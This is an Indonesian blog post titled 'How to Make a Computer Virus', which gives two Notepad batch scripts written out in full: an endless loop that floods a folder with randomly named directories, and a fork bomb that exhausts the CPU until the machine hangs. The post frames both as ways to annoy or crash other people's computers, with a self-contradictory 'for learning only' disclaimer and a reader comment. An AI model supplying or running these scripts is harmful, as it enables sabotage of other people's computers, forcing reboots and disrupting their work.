Dunia Hiburan Remaja

Cara Membuat Virus Komputer

Cara Membuat Virus Komputer Dengan Mematikan dan Berbahaya - Pada postingan kali ini saya akan berbagi tips tutorial bagaimana cara membuat virus komputer yang mudah dengan menggunakan notepad. Virus komputer adalah suatu program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain.

Ada berbagai jenis Virus komputer, mulai dari Virus tidak berbahaya sampai yang mematikan dan merusak perangkat keras dengan cara memuat program yang memaksa over process ke perangkat tertentu. Akibatnya komputer yang terserang virus akan cepat hang dan rusak.

Terdapat berbagai program/software untuk membuat virus komputer antara lain : C++, seprty, VB, pascal, Phyton yang tentunya menggunakan bahasa pemograman yang cukup sulit. Kali ini kita akan belajar cara membuat yang mudah yaitu hanya menggunakan notepad.

Cara Membuat Virus Komputer Dengan Notepad

  • Membuat virus yang Akan Membuat 1.000 Folder Dalam beberapa detik
    Berikut ini virus sederhana yang akan membuat sejumlah unlimmited folder di tempat yang anda inginkan. Tentunya akan kewalahan juga kalau ada 1000 folder yg tampil dalam beberapa detik…

    Langkah pertama :
    buka notepad dan ketik :
    @echo off
    :top
    md %random%
    goto top

    @ Echo off membuatnya sehingga tampaknya menjadi layar kosong tetapi sebenarnya ratusan pembuatan folder.
    Md %random% adalah perintah yang membuat folder dengan nama acak.
    goto top – kembali ke label: atas
    Langkah selanjutnya simpan misal dengan nama 1000folders.bat
    Setelah itu kamu akan mendapatkan ikon yang terlihat seperti ditunjukkan di bawah ini

    Jika ada orang yang menjalankan file 1000folders.bat maka akan terdapat 1000 folder yang dijamin akan membuat mereka kesal
     
  • Cara Membuat Virus Komputer Sederhana – Bom Fork
    Menjalankan fork  bom akan menyebabkan kemacetan total CPU karena komputer dipaksa membuka sekitar 500 proses command prompt secara berantai sehingga komputer akan kelebihan beban dan kemungkinan besar komputer akan hang.
    Cara membuat virus Bom Fork ini masih menggunakan Notepad, Buka Notepad dan ketik “%0|%0” (tanpa tanda kutip)



    Setelah itu save file tersebut dengan exstensi .bat, caranya klik file-->Save as .bat , sebagai contoh fork.bat

    Menjalankan File .bat yang kamu buat pada langkah 2, setelah sebuah bom yang sukses telah diaktifkan dalam sistem, mungkin harus reboot untuk mengembalikannya normal.
NB : Tips ini hanya untuk pembelajaran dan bukan untuk pembelajaran.

Demikianlah tips cara praktis membuat virus komputer sederhana dengan notepad. Ingat ya, Tips ini hanya untuk pembelajaran dan segala resiko ditanggung penumpang.Semoga bermamfaat dan tidak disalah gunakan

Cara Membuat Virus Komputer Rating: 4.5 Diposkan Oleh: Adriyanto Prasetyo

1 komentar:

Tarmizi Achmad said...

makasihatas informasinya..